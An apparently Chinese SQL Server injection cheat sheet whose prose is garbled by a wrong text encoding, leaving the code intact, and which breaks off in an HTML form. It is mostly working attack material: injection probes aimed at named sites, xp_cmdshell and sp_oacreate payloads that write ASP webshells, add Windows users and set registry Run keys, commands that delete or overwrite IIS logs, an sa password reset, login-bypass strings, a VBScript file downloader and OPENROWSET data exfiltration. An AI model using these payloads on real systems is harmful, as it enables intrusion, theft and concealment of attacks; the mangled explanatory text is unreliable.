Mssql injection code
1жݿ:
Access:
aNd aSc(cHr(97))=97
and exists(select id from MSysAccessObjects)
SQL Server:
and exists(select id from sysobjects)
MySQL:
and length(user())>0
ؼ%'and 1=1 and '%'='
ؼ%'and 1=2 and '%'='
Ƚϲͬ Ϊעַ
1 ^תַдASP(һ仰ľ)ļķ:
http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("l"^)^</script^> >c:\mu.asp';--
echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp
ʾSQLϵͳ汾
http://192.168.1.5/display.asp?keyno=188 and 1=(select @@VERSION)
http://www.xxxx.com/FullStory.asp?id=1 and 1=convert(int,@@version)--
Microsoft VBScript '800a03f6'
ȱ 'End'
/iisHelp/common/500-100.asp242
Microsoft OLE DB Provider for ODBC Drivers '80040e07'
Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Desktop Engine on Windows NT 5.0 (Build 2195: Service Pack 4) ' to a column of data type int.
/display.asp17
3 ڼйվ©ʱѾȷ©ȴ©ҵӦ͡żȻ뵽SQLпʹáinؼֽвѯ硰select * from mytable where id in(1)еֵύݣĽʹáselect * from mytable where id=1IJѯȫͬԷҳʱURLϡ) and 1=1 and 1 in(1ԭSQLͱˡselect * from mytable where id in(1) and 1=1 and 1 in(1)ͻڴѾõҳˡҾͽ͵©Ϊ͡ɣһ뵽˻Сַ͡ءˣơselect * from mytable where name in('firstsee')IJѯɵġ
4 жxp_cmdshellչ洢Ƿڣ
http://192.168.1.5/display.asp?keyno=188 and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')
ָxp_cmdshellչ洢
http://www.test.com/news/show1.asp?NewsId=125272
;exec master.dbo.sp_addextendedproc 'xp_cmdshell','e:\inetput\web\xplog70.dll';--
5 дкִг
http://192.168.1.5/display.asp?keyno=188;EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run','help1','REG_SZ','cmd.exe /c net user test ptlove /add'
6 鿴ǰݿƣ
? http://192.168.1.5/display.asp?keyno=188 and 0<>db_name(n) nij0,1,2,3ͿԿ
? http://www.xxxx.com/FullStory.asp?id=1 and 1=convert(int,db_name())--
Microsoft VBScript '800a03f6'
ȱ 'End'
/iisHelp/common/500-100.asp242
Microsoft OLE DB Provider for ODBC Drivers '80040e07'
Syntax error converting the nvarchar value 'huidahouse' to a column of data type int.
/display.asp17
7 гǰеݿƣ
select * from master.dbo.sysdatabases геļ¼
select name from master.dbo.sysdatabases гnameеļ¼
8 xp_cmdshell֧ע©SQLCMD
create TABLE mytmp(info VARCHAR(400),ID int IDENTITY(1,1) NOT NULL)
DECLARE @shell INT
DECLARE @fso INT
DECLARE @file INT
DECLARE @isEnd BIT
DECLARE @out VARCHAR(400)
EXEC sp_oacreate 'wscript.shell',@shell output
EXEC sp_oamethod @shell,'run',null,'cmd.exe /c dir c:\>c:\temp.txt','0','true'
--עrunIJtrueָǽȴеĽpingijʱʹô˲
EXEC sp_oacreate 'scripting.filesystemobject',@fso output
EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt'
--ΪfsoopentextfileһtextstreamԴʱ@fileһ
WHILE @shell>0
BEGIN
EXEC sp_oamethod @file,'Readline',@out out
insert INTO MYTMP(info) VALUES (@out)
EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out
IF @isEnd=1 BREAK
ELSE CONTINUE
END
drop TABLE MYTMP
----------
DECLARE @shell INT
DECLARE @fso INT
DECLARE @file INT
DECLARE @isEnd BIT
DECLARE @out VARCHAR(400)
EXEC sp_oacreate 'wscript.shell',@shell output
EXEC sp_oamethod @shell,'run',null,'cmd.exe /c cscript C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll" "C:\winnt\system32\inetsrv\asp.dll">c:\temp.txt','0','true'
EXEC sp_oacreate 'scripting.filesystemobject',@fso output
EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt'
WHILE @shell>0
BEGIN
EXEC sp_oamethod @file,'Readline',@out out
insert INTO MYTMP(info) VALUES (@out)
EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out
IF @isEnd=1 BREAK
ELSE CONTINUE
END
һ潫WEBûӵԱУ
DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c cscript C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll" "C:\winnt\system32\inetsrv\asp.dll">c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out insert INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END
һִEXE
DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c cscript.exe E:\bjeea.net.cn\score\fts\images\iis.vbs lh1 c:\>c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out insert INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END
SQLִCMDķ
ɾ7.18־
(1)exec master.dbo.xp_cmdshell 'del C:\winnt\system32\logfiles\W3SVC5\ex050718.log >c:\temp.txt'
(2)DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c del C:\winnt\system32\logfiles\W3SVC5\ex050718.log >c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out insert INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END
3ȿjetɳģʽͨչ洢xp_regwriteעʵ֣ԱעԤԭڰȫԭĬɳģʽδΪʲôҪxp_regwriteԭxp_regwriteҪDB_OWNERȨޣΪ˷㣬ィʹsysadmin Ȩԣ
? exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
ע
0 ֹһУĬϣ
1 ʹܷACCESSǽֹ
2 ֹACCESSʹ
3 ʹһ
? sysadminȨʹõ
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
? ݿ'L0op8ack'ο
EXEC sp_addlinkedserver 'L0op8ack','OLE DB Provider for Jet','Microsoft.Jet.OLEDB.4.0','c:\windows\system32\ias\ias.mdb'
? ʹݿ⣺
ʹʽִУǺܲңDB_OWNERȨDzģҪsysadminȨsecurityadmin+setupadminȨ
sp_addlinkedserverҪsysadminsetupadminȨ
sp_addlinkedsrvloginҪsysadminsecurityadminȨ
շ֣saȨsetupadmin+securityadminȨʻʹã
һûĸԱôͨʻȨ
ʵԲǿΪһѧϰܽ
¹£sysadminôIAS.mdbȨ֤
ҲԵʱhackerûsetupadmin+securityadminȨޣʹias.mdbʧ
Ҫһһûɷʵmdbſԣ
? ½ӷL0op8ack:EXEC sp_addlinkedserver 'L0op8ack','JetOLEDB','Microsoft.Jet.OLEDB.4.0','c:\winnt\system32\ias\ias.mdb';--
? exec sp_addlinkedsrvlogin 'L0op8ack','false';--
exec sp_addlinkedsrvlogin 'L0op8ack', 'false', NULL, 'test1', 'ptlove';--
? select * FROM OPENQUERY(L0op8ack, 'select shell("cmd.exe /c net user")');--
? exec sp_droplinkedsrvlogin 'L0op8ack','false';--
? exec sp_dropserver 'L0op8ack';--
ٿһļ7.18ļ
(1)exec master.dbo.xp_cmdshell 'copy C:\winnt\system32\logfiles\W3SVC5\ex050716.log C:\winnt\system32\logfiles\W3SVC5\ex050718.log>c:\temp.txt'
(2)DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c copy C:\winnt\system32\logfiles\W3SVC5\ex050716.log C:\winnt\system32\logfiles\W3SVC5\ex050718.log>c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out insert INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END
(3)DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c net user>c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out insert INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END
9 update±еݣ
HTTP://xxx.xxx.xxx/abc.asp?p=YY;update upload.dbo.admin set pwd='a0b923820dcc509a' where username='www';--
wwwû16λMD5ֵΪa0b923820dcc509aij1
32λMD5ֵΪ Ϊ
10 ñݵļ
SQLBCPѱݵıļŵָλáܣǿȽһʱȻڱһһеһASPľȻBCPγASPļ
иʽ£
bcp "select * from temp " queryout c:\inetpub\wwwroot\runcommand.asp Cc CS localhost CU sa CP upload('S'Ϊִвѯķ'U'Ϊû'P'Ϊ룬ϴһruncommand.aspľ)
11ݺͶȡݵķ
?
' and 1=1 union select 1,2,3,4;create table .((255))--
? ﲥݣ
' and 1=1 union select 1,2,3,4;DECLARE @result varchar(255) select top 1 name from upload.dbo.sysobjects where xtype='U' and status>0,@result output insert into cyfd (gyfd) values(@result);--
' and 1=1 union select 1,2,3,4;DECLARE @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots', '/' ,@result output insert into cyfd (gyfd) values(@result);--
? ӱȡݣ
' and 1=(select count(*) from cyfd where gyfd >1)--
? ɾʱ
';drop table cyfd;--
12ͨSQLֱӸsa룺
? update master.dbo.sysxlogins set password=0x0100AB01431E944AA50CBB30267F53B9451B7189CA67AF19A1FC944AA50CBB30267F53B9451B7189CA67AF19A1FC where sid=0x01,saͱǸij111111ǺǣķǰsaɾôɾԲοҵġȫɾsaš
? 鿴еݿû
select * from master.dbo.sysxlogins
select name,sid,password ,dbid from master.dbo.sysxlogins
? sasqlۺùӺִ
exec sp_password NULL,'','sa'
13ѯdvbbsеıͱṹ
? select * from dvbbs.dbo.sysobjects where xtype='U' and status>0
? select * from dvbbs.dbo.syscolumns where id=1426104121
14ֹݵǰݿ⣺
ȫݣ
;declare @a sysname,@s nvarchar(4000)
select @a=db_name(),@s='c:/db1' backup database @a to disk=@s WITH formAT--
챸ݣ
;declare @a sysname,@s nvarchar(4000)
select @a=db_name(),@s='c:/db1' backup database @a to disk=@s WITH DIFFERENTIAL,formAT
15ӺɾһSAȨûtest
exec master.dbo.sp_addlogin test,ptlove
exec master.dbo.sp_addsrvrolemember test,sysadmin
cmd.exe /c isql -E /U alma /P /i K:\test.qry
16select * from ChouYFD.dbo.sysobjects where xtype='U' and status>0
ͿгChouYFDеûı
select name,id from ChouYFD.dbo.sysobjects where xtype='U' and status>0
17
? http://www.npc.gov.cn/zgrdw/common/image_view.jsp?sqlstr=select * from rdweb.dbo.syscolumns where id=1234
гrdwebбеֶ
? select * from dvbbs.dbo.syscolumns where id=5575058
гdvbbsбid=5575058ֶ
18ɾ¼delete from Dv_topic where boardid=5 and topicid=7978
19ƹ¼̨֤ķ
1) ' or''='
2) ' or 1=1--
3) ' or 'a'='a--
4) 'or'='or'
5) " or 1=1--
6or 1=1--
7 or 'a='a
8" or "a"="a
9 ') or ('a'='a
10 ") or ("a"="a
11 or (1=1
12) 'or''='
13) %' and 1=1 and '%'='
20Ѱվ·ķܣ
1鿴WEBվװĿ¼
? cscript c:\inetpub\adminscripts\adsutil.vbs enum w3svc/2/root >c:\test1.txt 21345ԣ
type c:\test1.txt
del c:\test1.txt
NBSI¿ֱʾнԲõļ
2վҵһͼƬ 123.jpg
Ȼд123.bat:
d:
dir 123.jpg /s >c:\123.txt
e:
dir 123.jpg /s >>c:\123.txt
f:
dir 123.jpg /s >>c:\123.txt
ִк type c:\123.txt
վ·
3SQLվͬһϣǿִǰɣ
ִ
%windir%\help\iishelp\common\404b.htm500.asp
עǰBackupļ
磺
dir c:\ >%windir%\help\iishelp\common\404b.htm
Ȼһļʣhttp://Ŀip/2.asp
4win2000ϵͳxp_regreadȡHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots ȡWEB·
2003ϵͳxp_regreadȡδҵ
磺
1 ½һcyfd(ֶΪgyfd)http://www.cnwill.com/NewsShow.aspx?id=4844;create table .((255))--
2 web·дȥ:http://www.cnwill.com/NewsShow.aspx?id=4844;DECLARE @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots', '/' ,@result output insert into cyfd (gyfd) values(@result);--
3 ƥ䣬ʾ:http://www.cnwill.com/NewsShow.aspx?id=4844 and 1=(select count(*) from cyfd where gyfd >1)
Source: .Net SqlClient Data Provider
Description: varchar ֵ 'Y:\Web\̨˲ߺ̨ϵͳ,,201 ' תΪΪ int ʱ
TargeSite: Boolean Read() ·¶ˡ
4ɾ:http://www.cnwill.com/NewsShow.aspx?id=4844;drop table cyfd;--
5regeditעĽ·%windir%\help\iishelp\common\404b.htm500.aspҳ
regedit˵
Regedit /L:system /R:user /E filename.reg Regpath
壺
/LsystemָSystem.datļڵ·
/RuserָUser.datļڵ·
/E˲ָע༭Ҫеעڴ˲һ뵼עļ
RegpathָҪĸעķָ֧ȫע֧ЩУ"/Lsystem""/Ruser"ǿѡʹע༭ΪǶWINDOWSĿ¼µ"system.dat""user.dat"ļвͨDOSôͱʹ"/L""/R"ָ"system.dat""user.dat"ļľ·ע༭ҵǡ˵ͨ̽DOSע"Regedit /L:C:\windows\/R:C:\windows\/e regedit.reg",˼ǰעݵWINDOWSĿ¼£ļΪ"regedit.reg""regedit /E D:\regedit.reg"˵עݵD̵ĸĿ¼£ʡ"/L""/R"ļΪ"Regedit.reg"
regedit /s c:\adam.reg c:\adam.regļע
regedit /e c:\web.reg ȫעݵc:\web.regУ
win2000ϵͳC:\>regedit /e %windir%\help\iishelp\common\404b.htm "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots"
Ȼhttp://ĿIP/2.asp
win2003ϵͳûҵϣҵѹһۡ
6%SystemRoot%\system32\inetsrv\MetaBack\µļiisıļwebûʵģiisݵwebshellü±ԻȡӦweb·
7SQLע뽨Ŀ¼dboȨҲweb·һֽ취
Ǻܶ¶SQLעĿ¼ȴܲҵwebĿ¼ҲͲõõһwebshellһв
? Ŀ¼win,ָc:\winnt\system32exec master.dbo.xp_cmdshell 'cscript C:\inetpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\winnt\system32"'
? winĿ¼нaspűȨޣexec master.dbo.xp_cmdshell 'cscript C:\inetpub\AdminScripts\adsutil.vbs set w3svc/1/root/win/Accessexecute "true" Cs:'
? ɾĿ¼winexec master.dbo.xp_cmdshell 'cscript C:\inetpub\AdminScripts\adsutil.vbs delete w3svc/1/root/win/'
? ԣhttp://127.0.0.1/win/test.asp
8SQLWEBĿ¼ݾ飬WEBĿ¼˳ǣd̡e̡c̣ǽһʱڴmaster..xp_dirtree(ʺpublic)ɵĿ¼,䣺
;create table temp(dir nvarchar(255),depth varchar(255));--,ñdirֶαʾĿ¼ƣdepthֶαʾĿ¼ȡȻִxp_dirtreeD̵Ŀ¼£
;insert temp(dir,depth) exec master.dbo.xp_dirtree 'd:';--
ڽIJǰȲ鿴DмļУDиµ˽⣬£
and (select count(*) from temp where depth=1 and dir not in('Documents and Settings','Program Files','RECYCLER','System Volume Information','WINDOWS','CAConfig','wmpub','Microsoft UAM '))>=(=0123...)
ţڶԷվҼһĿ¼userphotoȻɸѡķжWEBĿ¼Ƿڴϣ£
and (select count(*) from temp where dir<>'user')<(select count(*) from temp)
ķؽΪ棬ʾWEBĿ¼пڴϣΪ˽һȷϣԼĿ¼
and (select count(*) from temp where dir<>'photo')<(select count(*) from temp)
...
еIJԽΪ棬ʾWEBĿ¼пڴϡ
ҵWEBĿ¼ڴϣµһĿ¼ȣ
and (select depth from temp where dir='user')>=(=123...)
õdepth3,˵userĿ¼D̵3Ŀ¼WEBĿ¼D̵ĶĿ¼
ĿǰѾ֪˸Ŀ¼ڵ̷ȣҪҵĿ¼ľλãD̸Ŀ¼ʼһѰȻûбҪ֪ÿĿ¼ƣ̫ķʱˡ
⽨һʱD̵1Ŀ¼µĿ¼£
;create table temp1(dir nvarchar(255),depth varchar(255));--
ȻѴD̵ĵһĿ¼µĿ¼浽temp1У£
declare @dirname varchar(255);set @dirname='d:\'+(select top 1 dir from (select top 1 dir from temp where depth=1 and dir not in('Documents and Settings','Program Files','RECYCLER','System Volume Information','WINDOWS','CAConfig','wmpub','Microsoft UAM ') order by dir desc)T order by dir);insert into temp1 exec master.dbo.xp_dirtree @dirname
ȻҲD̵ĵڶĿ¼µĿ¼浽temp1Уֻѵڶtop 1Ϊtop 2ˡ
ڣtemp1ѾD̵һĿ¼µĿ¼,ȻͬķжϸĿ¼ǷڴһĿ¼£
and (select count(*) from temp1 where dir<>'user')<(select count(*) from temp1)
Ϊ棬ʾĿ¼ڴĿ¼£סҪԼӣΪ٣WEBĿ¼ڴĿ¼£ȻͬķD̵23...Ŀ¼µĿ¼бжWEBĿ¼Ƿ¡ǣҪע⣬xp_dirtreeǰһҪtemp1еɾ
ڼ裬WEBĿ¼D̵ĵһĿ¼£Ŀ¼Ϊwebsite,Ŀ¼벻˵˰ɡΪǰ֪WEBĿ¼Ϊ2Ҫ֪websiteµĸWEBĿ¼
ڣͬķٽ3ʱ
;create table temp2(dir nvarchar(255),depth varchar(255));--
ȻѴD̵websiteµĿ¼浽temp2У£
declare @dirname varchar(255);set @dirname='d:\website\'+(select top 1 dir from (select top 1 dir from temp1 where depth=1 and dir not in('Documents and Settings','Program Files','RECYCLER','System Volume Information','WINDOWS','CAConfig','wmpub','Microsoft UAM ') order by dir desc)T order by dir);insert into temp2 exec master.dbo.xp_dirtree @dirname
ȻҲD̵websiteµڶĿ¼µĿ¼浽temp2Уֻѵڶtop 1Ϊtop 2ˡ
ڣͬķжϸĿ¼ǷΪĿ¼
and (select count(*) from temp2 where dir<>'user')<(select count(*) from temp2)
Ϊ棬ΪȷǵжϣԼӣ涼ˣӶΪ棬ôȷ˸Ŀ¼ΪWEBĿ¼
ϵķϿԻWEBĿ¼ǼWEBĿ¼ǣD:\website\www
ȻǾͿԱݵǰݿĿ¼ءǰǰtemptemp1temp2գȻCDE̵Ŀ¼ֱ浽temptemp1temp2С
ݿҪǵðʱdropصݿпҵеĿ¼б̨Ŀ¼ԼϢ
21win2000½WEBûΪϵͳûȨޣҪйԱȨִУ
c:\>cscript C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll" "C:\winnt\system32\inetsrv\asp.dll"
cscript C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\windows\system32\idq.dll" "C:\windows\system32\inetsrv\httpext.dll" "C:\windows\system32\inetsrv\httpodbc.dll" "C:\windows\system32\inetsrv\ssinc.dll" "C:\windows\system32\msw3prt.dll" "C:\windows\system32\inetsrv\asp.dll"
鿴Ƿɹ
c:\>cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps
Microsoft (R) Windows Script Host Version 5.6
Ȩ(C) Microsoft Corporation 1996-2001Ȩ
inprocessisapiapps : (LIST) (6 Items)
"C:\WINNT\system32\idq.dll"
"C:\WINNT\system32\inetsrv\httpext.dll"
"C:\WINNT\system32\inetsrv\httpodbc.dll"
"C:\WINNT\system32\inetsrv\ssinc.dll"
"C:\WINNT\system32\msw3prt.dll"
"c:\winnt\system32\inetsrv\asp.dll"
22ASPľ
DZĿ¼mkdir images..\
ASPľĿ¼copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
ͨwebASPľhttp://ip/images../news.asp?action=login
ɾDZĿ¼rmdir images..\ /s
23ȥtenlnetntlm֤
;exec master.dbo.xp_cmdshell 'tlntadmn config sec = -ntlm'
24echoдļؽűiget.vbs:
(1)echo Set x= createObject(^"Microsoft.XMLHTTP^"):x.Open ^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s = createObject(^"ADODB.Stream^"):s.Mode = 3:s.Type = 1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >c:\iget.vbs
(2)c:\>cscript iget.vbs http://127.0.0.1/asp/dbm6.asp dbm6.asp
25ֹIISĿ¼ķ
? 鿴Ŀ¼бcscript.exe c:\inetpub\AdminScripts\adsutil.vbs enum w3svc/1/root
? ½һkissĿ¼mkdir c:\asp\kiss
? kissĿ¼cscript.exe c:\inetpub\AdminScripts\mkwebdir.vbs -c MyComputer -w "Default Web Site" -v "kiss","c:\asp\kiss"
? ΪkissĿ¼ִкдȨޣ
cscript.exe c:\inetpub\AdminScripts\adsutil.vbs set w3svc/1/root/kiss/kiss/accesswrite "true" -s:
cscript.exe c:\inetpub\AdminScripts\adsutil.vbs set w3svc/1/root/kiss/accessexecute "true" -s:
? ?:Cscript c:\inetpub\AdminScripts\adsutil.vbs set /w3svc/1/root/kiss/createprocessasuser false
? ʣhttp://127.0.0.1/kiss/test.asp
26ʹopenrowset()رԣ
select a.*
FROM OPENROWSET('SQLOLEDB','127.0.0.1';'sa';'111111',
'select * FROM ..') AS a
select * FROM OPENROWSET('SQLOLEDB','127.0.0.1';'sa';'111111',
'select * FROM ..')
27
http://www.xxxx.com/FullStory.asp?id=1 and 1=convert(int,@@servername)--
select convert(int,@@servername)
select @@servername
28ݿû
http://www.XXXX.com/FullStory.asp?id=1 and 1=convert(int,system_user)--
http://www.19cn.com/showdetail.asp?id=49 and user>0
select user
29ͨûWEBSHELLķ֮
?
EXEC .. 'c:\test.rar','default',1,'d:\cmd.asp'
ڵõwebshell
? EXEC .. 'C:\test.rar','c:',1, 'n.asp'
? ļݣҪmasterdboȨޣ
EXEC .. 1,'c:\cmd.asp'
30sa Ȩ֪web·ֱӱݿweb·
http://www.XXXX.com/FullStory.asp?id=1;backuup database ݿ to disk='c:\inetpub\wwwroot\save.db' ѵõȫݵWEBĿ¼£HTTPѴļ(ȻѡҪ֪WEBĿ¼)
? ϵͳĿ¼ṹWEBĿ¼ȴһʱtemp
http://www.XXXX.com/FullStory.asp?id=1;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
? ǿxp_availablemediaõǰ,tempУ
http://www.XXXX.com/FullStory.asp?id=1;insert temp exec master.dbo.xp_availablemedia;--
? ǿͨѯtempбϢxp_subdirsĿ¼б,tempУ
http://www.XXXX.com/FullStory.asp?id=1;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';--
? ǻxp_dirtreeĿ¼Ŀ¼ṹ,tempУ
http://www.XXXX.com/FullStory.asp?id=1;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- ͿԳɹеĿ¼ļУб
? Ҫ鿴ijļݣִͨxp_cmdsell;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';--
? ʹ'bulk insert'Խһıļ뵽һʱС磺bulk insert temp(id) from 'c:\inetpub\wwwroot\index.asp' tempͿԿindex.aspļˣͨASPļԵõϵͳϢWEBϢԵõSAʺŵ롣
31һЩsqlеչ洢ܽ:
xp_availablemedia ʾϵͳϿõ̷'C:\' xp_availablemedia
xp_enumgroups гǰϵͳʹȺ鼰˵ xp_enumgroups
xp_enumdsn гϵͳѾúõODBCԴ xp_enumdsn
xp_dirtree ʾijĿ¼µĿ¼ļܹ xp_dirtree 'C:\inetpub\wwwroot\'
xp_getfiledetails ȡijļ xp_getfiledetails 'C:\inetpub\wwwroot.asp'
dbp.xp_makecab ĿѹijѹĵԽڲĺöŸ dbp.xp_makecab 'C:\lin.cab','evil',1,'C:\inetpub\mdb.asp'
xp_unpackcab ѹ xp_unpackcab 'C:\hackway.cab','C:\temp',1
xp_ntsec_enumdomains г xp_ntsec_enumdomains
xp_servicecontrol ֹͣij xp_servicecontrol 'stop','schedule'
xp_terminate_process pidֹͣijִеij xp_terminate_process 123
dbo.xp_subdirs ֻijĿ¼µĿ¼ dbo.xp_subdirs 'C:\'
32
USE MASTER
GO
create proc sp_MSforeachObject
@objectType int=1,
@command1 nvarchar(2000),
@replacechar nchar(1) = N'?',
@command2 nvarchar(2000) = null,
@command3 nvarchar(2000) = null,
@whereand nvarchar(2000) = null,
@precommand nvarchar(2000) = null,
@postcommand nvarchar(2000) = null
as
/* This proc returns one or more rows for each table (optionally, matching @where), with each table defaulting to its
own result set */
/* @precommand and @postcommand may be used to force a single result set via a temp table. */
/* Preprocessor won't replace within quotes so have to use str(). */
declare @mscat nvarchar(12)
select @mscat = ltrim(str(convert(int, 0x0002)))
if (@precommand is not null)
exec(@precommand)
/* Defined @isobject for save object type */
Declare @isobject varchar(256)
select @isobject= case @objectType when 1 then 'IsUserTable'
when 2 then 'IsView'
when 3 then 'IsTrigger'
when 4 then 'IsProcedure'
when 5 then 'IsDefault'
when 6 then 'IsForeignKey'
when 7 then 'IsScalarFunction'
when 8 then 'IsInlineFunction'
when 9 then 'IsPrimaryKey'
when 10 then 'IsExtendedProc'
when 11 then 'IsReplProc'
when 12 then 'IsRule'
end
/* create the select */
/* Use @isobject variable isstead of IsUserTable string */
EXEC(N'declare hCForEach cursor global for select ''['' + REPLACE(user_name(uid), N'']'', N'']]'') + '']'' + ''.'' + ''['' +
REPLACE(object_name(id), N'']'', N'']]'') + '']'' from dbo.sysobjects o '
+ N' where OBJECTPROPERTY(o.id, N'''+@isobject+''') = 1 '+N' and o.category & ' + @mscat + N' = 0 '
+ @whereand)
declare @retval int
select @retval = @@error
if (@retval = 0)
exec @retval = sp_MSforeach_worker @command1, @replacechar, @command2, @command3
if (@retval = 0 and @postcommand is not null)
exec(@postcommand)
return @retval
GO
/*
1еĴ洢̵Ľű
EXEc sp_MSforeachObject @command1="sp_helptext '?' ",@objectType=4
2еͼĽű
EXEc sp_MSforeachObject @command1="sp_helptext '?' ",@objectType=2
EXEc sp_MSforeachObject @command1="sp_changeobjectowner '?', 'dbo'",@objectType=1
EXEc sp_MSforeachObject @command1="sp_changeobjectowner '?', 'dbo'",@objectType=2
EXEc sp_MSforeachObject @command1="sp_changeobjectowner '?', 'dbo'",@objectType=3
EXEc sp_MSforeachObject @command1="sp_changeobjectowner '?', 'dbo'",@objectType=4
*/
33DB_OWNERȨµݿⱸݷ
openrowsetɡԼݿ~ڱؽĿһṹı~ֶʹnvarchar.ȻúӶԷSQLݿ⣬ڲѯִ
insert into OPENROWSET ('sqloledb','server=ݿIP;uid=user;pwd=pass;database=dbname; ','select * from 㽨ı) select * from Էı
Ҫ̫ĻͿݿûԶŵֶ.select * from where id>100
Ū
ҪǺWEB̨ͬĻֱӽBAKWEBĿ¼»OKǰⲻ̫2GĻSQLͳʱ
SAȨASPݿ⣺
sqlbackup1.asp
<HTML>
<HEAD>
<TITLE>SQL Server ݿıָ</TITLE>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
</HEAD>
<BODY>
<form method="post" name=myform>
ѡ<INPUT TYPE="radio" NAME="act" id="act_backup" value="backup"><label for=act_backup></label>
<INPUT TYPE="radio" NAME="act" id="act_restore" value="restore"><label for=act_restore>ָ</label>
